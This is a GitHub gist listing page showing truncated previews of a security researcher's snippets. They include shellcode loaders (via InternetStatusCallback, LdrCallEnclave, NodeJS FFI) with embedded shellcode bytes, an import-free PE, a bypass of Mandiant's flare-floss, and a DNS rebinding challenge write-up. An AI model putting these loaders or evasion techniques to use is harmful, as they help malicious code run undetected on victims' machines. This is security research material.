Skip to content

Instantly share code, notes, and snippets.

View whokilleddb's full-sized avatar
💭
Helping to make open source a tad bit more secure

whokilleddb whokilleddb

💭
Helping to make open source a tad bit more secure
239 followers · 25 following
View GitHub Profile
@whokilleddb
whokilleddb / Program.cs
Created October 29, 2025 22:44 — forked from susMdT/Program.cs
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)
@whokilleddb
whokilleddb / Program.cs
Created October 29, 2025 22:27
CLR uses an executable heap - so why shouldn't we?
using System;
using System.Runtime.InteropServices;
namespace ExecutableHeapInfo
{
class Program
{
// Import GetProcessExecutableHeap from mscoreei.dll
[DllImport("mscoreei.dll", SetLastError = true)]
private static extern IntPtr GetProcessExecutableHeap();
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@whokilleddb
whokilleddb / LowNtReadFile.c
Created August 12, 2025 21:19
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
@whokilleddb
whokilleddb / enclave.c
Created August 3, 2025 21:35
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@whokilleddb
whokilleddb / main.cc
Created July 25, 2025 18:18
Run code before main()
#include <stdio.h>
#ifdef _MSC_VER
#ifdef __cplusplus
#define CONSTRUCTOR_FUNC(func) \
struct func##_constructor { \
func##_constructor() { func(); } \
}; \
@whokilleddb
whokilleddb / main.c
Created July 24, 2025 17:53
PoC code to bypass flare/floss by mandiant
/*
main.c - Demonstrate how easy it is to bypass flare-floss with a single line
Compile with:
x86_64-w64-mingw32-gcc main.c -o main.exe -masm=intel
*/
#include <windows.h>
#include <stdio.h>
@whokilleddb
whokilleddb / shellcode.js
Created October 11, 2023 11:16
NodeJS FFI to run shellcode!
const ffi = require('ffi-napi');
const ref = require("ref-napi");
const SIZE_T = ref.types.uint64;
const DWORD = ref.types.uint32;
const VOID = ref.types.void;
const LPVOID = ref.refType(VOID);
const HANDLE = LPVOID;
const LPDWORD = ref.refType(DWORD);
@whokilleddb
whokilleddb / launcher.c
Last active August 3, 2025 22:03
PE without any imports!
// Compile with: cl.exe /Ox /W0 /GS- launcher.c
// Check imports with: dumpbin /imports launcher.exe
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(linker, "/entry:WinMain")
// Function Pointers
@whokilleddb
whokilleddb / Solution_08_12.md
Created December 8, 2022 16:20
Intigriti Spot The Bug Solution 08/12

Intigriti Spot The Bug Solution 08/12

The given code snippet is vulnerable to DNS rebinding attack where an attacker can switch the IP addresses associated with domain names to pass certain security checks!

To understand this challenge, let's look at the source code:

First things first, there are two files:

  • app.js: Our friendly vulnerable application
  • local.js: A simple server which gives us our flag!